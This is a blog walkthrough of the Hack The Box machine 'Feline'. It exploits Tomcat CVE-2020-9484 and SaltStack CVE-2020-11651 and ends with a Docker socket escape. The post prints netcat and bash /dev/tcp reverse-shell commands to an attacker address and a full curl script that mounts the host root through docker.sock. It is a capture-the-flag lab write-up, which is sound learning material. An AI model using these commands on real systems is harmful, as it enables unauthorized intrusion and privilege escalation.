Hack The Box — Feline

Hey folks, today we have a new HTB walkthrough with one with the best hard machines “Feline”.

What we will do ?

As usual, we have some steps which we follow to pwn any machine, our steps are:

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

After finishing our steps we will have these informations, stay calm and follow reading :)

1. Information Gathering

In this step we aim to collect all these informations, which we can collect on a specific target like its open ports, security mode of login systems, directories, OS version, services versions, etc

We will start with nmap to check the upper requirements

nmap -A -T4 or namp -sS -sV -T4 -O

we have 2 open ports 22/8080 and we know the version of each server OpenSSH and Apache Tomcat , so let’s check for the website to know what we have

After checking all the available endpoints and directories, I’ve found that /services works

We have an upload function which accept any file txt,php,exe,etc so we can understand that it doesn’t validate the content and the file extension.

For now let’s search for any other information and note what we have got.

For the Apache TomCat server version I’ve searched for available CVE’s and found that it’s vulnerable by RCE

For now, we get another important info that our Tomcat may be vulnerable by CVE-2020-9484

I say “may be vulnerable” because it may be patched for this machine

After checking for the vulnerability details, I’ve found this awesome blog which discuss how to exploit it, and it’s reasons.

After reading, the prerequisites are:

  1. The PersistentManager is enabled and it’s using a FileStore
  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
  3. There are gadgets in the classpath that can be used for a Java deserialization attack

For know, we have finished this step, let’s jump to the next step.

2. Scanning

In this step we aim to scan all collected info from the previous one, so let’s check if we have the prerequisites or not.

We need to check if:

  1. We have upload function?
  2. IsPersistentManager enabled?
  3. We know the upload file path on the server ?
  4. We know the upload directory?

For the first one we have upload function, so let’s test more than upload process to check for the results and know the server behavior

After uploading txt file we have the upload directory from the request /upload.jsp?email= which validate the exploit request, nice job :)

As I said before it accepts all contents which we can upload, So it doesn’t validate the content-type / file content or Magic number so let’s play with the filename

I’ve made an error to see the server behavior like rename the file with space or leave it empty

Great! We have important informations in the response like upload path on the server.

Let’s search for any public exploit code to save our time.

This repo is amazing, it collects all steps in a sh file, but it asks to download the jar file from ysoserial to generate the payload

You can download it from here

Okay that’s enough here, let’s jump to the next step

3. Gaining Access

After checking all exploit requirements

Let’s run it

and for our listener nc

It returns a shell :) Fantastic

Now we need to escalate our privileges to get the root user, so let’s jump to the next step.

4. Maintaining Access

In this step we aim to find any information which may be leaked or not handled well to use to and get new privileges, so you can use linpeas or linenum or even check manually.

Any way, after checking the network states using netstat command:

I’ve found that we have 2 ports which localhost listen on them 4505/4506 and after searching for these 2 ports, I’ve discovered that they related to something called saltslack it’s software running on them.

After some search, I discovered that they’re vulnerable CVE-2020–11651 !!

After checkig the vulneability details from here

Here’s the command and the arguments

python3 exploit.py --master --exec "nc xx.xx.xx.xx xxxx -e /bin/sh"

It will work on the port which listen on 4506 and in our case it’s the localhost so we need to make port tunneling using chiesel

Local machine: 
./chiesel server -p 80 --reverse
Vulnerable machine:
./chiesel client 10.10.xx.xx:80 R:4506:
Local machine
Vulnerable machine

Let’s execute our exploit to get another shell…

Unfortunately!! We don’t have the root.txt but we have a hint tells us that we’re inside a docker.

After enumerating the box again, I’ve found a file called /run/docker.sock

After searching for docker.sock privileges escalation I’ve found this blog and also this blog is awesome

For now, we have the exploit code after checking the upper blogs and asking friend for help

pay="bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/8888 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]" response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start sleep 1 curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

after running it and see what we have on the listener

It works, and we’ve accessed the root.txt and get the Super User privileges :)

If you speak Arabic, you can watch my walkthrough which I’ve explained all these steps from here

If you find it helpful, Kindly give me a respect from here eslam3kl — HTB

Stay in touch

LinkedIn | GitHub | Twitter



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Penetration Tester, Bug Hunter, Author of 10 CVEs, Author of multiple security tools, and more :) You can find me on Twitter @eslam3kll